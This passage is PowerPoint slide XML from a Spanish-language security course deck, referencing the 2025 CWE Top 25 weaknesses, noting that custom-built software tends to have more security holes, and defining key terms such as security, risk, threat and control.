        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectángulo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BC1615-976B-3456-ACFA-E45360DE2640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567930" y="1068039"/>
            <a:ext cx="9737666" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Las 25 principales debilidades de software más peligrosas de 2025.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectángulo 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EEA4C30-2718-8861-3215-F57CE3529A4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9411531" y="4776804"/>
            <a:ext cx="1785776" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referencia: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>2025 CWE Top 25 Most Dangerous Software Weaknesses.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41548302-374C-9B8A-A517-54FBCF467A38}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8" descr="Tabla&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BC048A5-4DF2-542B-D582-DE575496C2A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1227961" y="1437371"/>
            <a:ext cx="7877590" cy="4591191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="684045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A33C6-0585-C4F1-3DD5-3A9866B7BE90}"/>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99DC170D-13FA-A3BC-F347-B4FAA607FB7D}"/>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60117EC-6E07-DE06-CF52-49560B5817EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="251936"/>
            <a:ext cx="9884664" cy="1569660"/>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El principal riesgo reside en el uso de software desarrollado o modificado de forma específica</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8FD5A79-0945-C947-8E9D-79F070A9BAF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3FEF2555-89A2-519B-DD8A-F965595EE6F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429767" y="1908914"/>
            <a:ext cx="10796529" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603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so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="467886"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603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ftware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603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desarrollado ad hoc para una organización</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tendrá agujeros de seguridad con mayor probabilidad. Esto se debe al hecho de que estos serán sus componentes software menos probados y validados por la industria, al usarse por ellos en exclusiva.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No reinventar la rueda, cualquier componente software desarrollado por nosotros no ha sido probado por nadie más.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2938EED7-B72F-55A1-07BE-C710140A0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425" y="3140052"/>
            <a:ext cx="5507009" cy="2978356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{943613B7-8A6B-671B-1664-5FED703560D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200336" y="3428999"/>
            <a:ext cx="2910032" cy="2338490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C5CF4E3-FA42-CD39-66F2-52AA6CEC9C01}"/>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3185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426E-889D-D9A0-7EE1-CFAFEFA7A5C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4BD0EC2-C466-CDAD-57FA-FDD00E5A93D9}"/>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AE59E7F-5DA7-CE19-172C-023FE2F6C618}"/>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Definiciones clave</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15444602-FD42-A920-4F55-306AB566549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83B237C0-AEC0-D518-C526-C4CB4F90BEF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2259724" y="1389816"/>
            <a:ext cx="1046480" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Grupo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D88B388-D15D-56BA-9E95-FC07E6516553}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1306711" y="1527439"/>
            <a:ext cx="1906025" cy="3807407"/>
            <a:chOff x="756241" y="4572584"/>
            <a:chExt cx="3353598" cy="7977215"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="193330"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform: Shape 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDBC4283-5E1F-D4C8-C005-0456DD8E50AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="756241" y="4572584"/>
              <a:ext cx="3353597" cy="7977213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 2438401 w 2438401"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 4690630"/>
                <a:gd name="connsiteX1" fmla="*/ 2438401 w 2438401"/>
                <a:gd name="connsiteY1" fmla="*/ 583190 h 4690630"/>
                <a:gd name="connsiteX2" fmla="*/ 2438401 w 2438401"/>
                <a:gd name="connsiteY2" fmla="*/ 4107440 h 4690630"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 2438401"/>
                <a:gd name="connsiteY3" fmla="*/ 4690630 h 4690630"/>
                <a:gd name="connsiteX4" fmla="*/ 1 w 2438401"/>
                <a:gd name="connsiteY4" fmla="*/ 583190 h 4690630"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 2438401"/>
                <a:gd name="connsiteY5" fmla="*/ 583190 h 46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1" h="4690630">
                  <a:moveTo>
                    <a:pt x="2438401" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2438401" y="583190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2438401" y="4107440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="4690630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="583190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="58319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r>
                <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>SEGURIDAD INFORMÁTICA</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Conjunto de medidas enfocadas para la protección de la infraestructura computacional y todo lo vinculado con la misma. </a:t>
              </a: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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform: Shape 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E3F656C-8C88-5E69-8A05-7D2FB349988A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="756244" y="11402291"/>
              <a:ext cx="3353595" cy="1147508"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 2381251 w 2381251"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 674739"/>
                <a:gd name="connsiteX1" fmla="*/ 2381251 w 2381251"/>
                <a:gd name="connsiteY1" fmla="*/ 91549 h 674739"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 2381251"/>
                <a:gd name="connsiteY2" fmla="*/ 674739 h 674739"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 2381251"/>
                <a:gd name="connsiteY3" fmla="*/ 574572 h 674739"/>
                <a:gd name="connsiteX4" fmla="*/ 2381251 w 2381251"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 674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1" h="674739">
                  <a:moveTo>
                    <a:pt x="2381251" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2381251" y="91549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="674739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="574572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381251" y="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bg1"/>
                </a:solidFill>
                <a:latin typeface="Fira Sans SemiBold" panose="020B0603050000020004" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Grupo 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DECADB4-3AA5-C595-1C3B-166D4BC84B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3203381" y="1986728"/>
            <a:ext cx="1906023" cy="3807407"/>
            <a:chOff x="4210442" y="4572584"/>
            <a:chExt cx="3353595" cy="7977213"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform: Shape 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC5E428-C712-59E4-918F-8F996F25155D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4210442" y="4572584"/>
              <a:ext cx="3353595" cy="7977213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2438400"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 4690630"/>
                <a:gd name="connsiteX1" fmla="*/ 2438400 w 2438400"/>
                <a:gd name="connsiteY1" fmla="*/ 583190 h 4690630"/>
                <a:gd name="connsiteX2" fmla="*/ 2438400 w 2438400"/>
                <a:gd name="connsiteY2" fmla="*/ 583190 h 4690630"/>
                <a:gd name="connsiteX3" fmla="*/ 2438400 w 2438400"/>
                <a:gd name="connsiteY3" fmla="*/ 583190 h 4690630"/>
                <a:gd name="connsiteX4" fmla="*/ 2438400 w 2438400"/>
                <a:gd name="connsiteY4" fmla="*/ 4690630 h 4690630"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 2438400"/>
                <a:gd name="connsiteY5" fmla="*/ 4107440 h 4690630"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 2438400"/>
                <a:gd name="connsiteY6" fmla="*/ 583190 h 4690630"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2438400"/>
                <a:gd name="connsiteY7" fmla="*/ 583190 h 4690630"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 2438400"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 46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4690630">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2438400" y="583190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2438400" y="583190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2438400" y="583190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2438400" y="4690630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4107440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="583190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="583190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="AFFFE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r>
                <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>RIESGO</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Estimación  del grado de exposición a que una amenaza se materialice sobre uno o más activos causando daños o perjuicios a la Organización. </a:t>
              </a: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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform: Shape 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{155B9FEA-1767-1B76-18F4-EEED6EA5B594}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4210442" y="11402291"/>
              <a:ext cx="3353594" cy="1147506"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2381250"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 674738"/>
                <a:gd name="connsiteX1" fmla="*/ 2381250 w 2381250"/>
                <a:gd name="connsiteY1" fmla="*/ 574571 h 674738"/>
                <a:gd name="connsiteX2" fmla="*/ 2381250 w 2381250"/>
                <a:gd name="connsiteY2" fmla="*/ 674738 h 674738"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 2381250"/>
                <a:gd name="connsiteY3" fmla="*/ 91548 h 674738"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 2381250"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 6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0" h="674738">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2381250" y="574571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381250" y="674738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="AFFFE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14" name="Grupo 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5E69ACD-276F-7E4C-5015-EF14EDF6777C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5110393" y="1406130"/>
            <a:ext cx="1906022" cy="3807406"/>
            <a:chOff x="7664641" y="5564397"/>
            <a:chExt cx="3353595" cy="6985402"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="BABFB9"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B5DB6BD-473A-BDD6-9F59-F2BDE4A219B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7664641" y="5564397"/>
              <a:ext cx="3353595" cy="6985400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="19333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r>
                <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>AMENAZA</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="es-ES" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Causa</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>potencial de un incidente que puede causar daños a un Sistema de información o a una Organización.</a:t>
              </a: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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform: Shape 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{055BE46B-E1B5-99B2-32A7-BFB190504A81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7664641" y="12379448"/>
              <a:ext cx="3353595" cy="170351"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2381251"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 100167"/>
                <a:gd name="connsiteX1" fmla="*/ 2381251 w 2381251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 100167"/>
                <a:gd name="connsiteX2" fmla="*/ 2381251 w 2381251"/>
                <a:gd name="connsiteY2" fmla="*/ 100167 h 100167"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 2381251"/>
                <a:gd name="connsiteY3" fmla="*/ 100167 h 100167"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 2381251"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 10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1" h="100167">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2381251" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381251" y="100167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="100167"/>
                  </a:lnTo>
                  <a:lnTo>
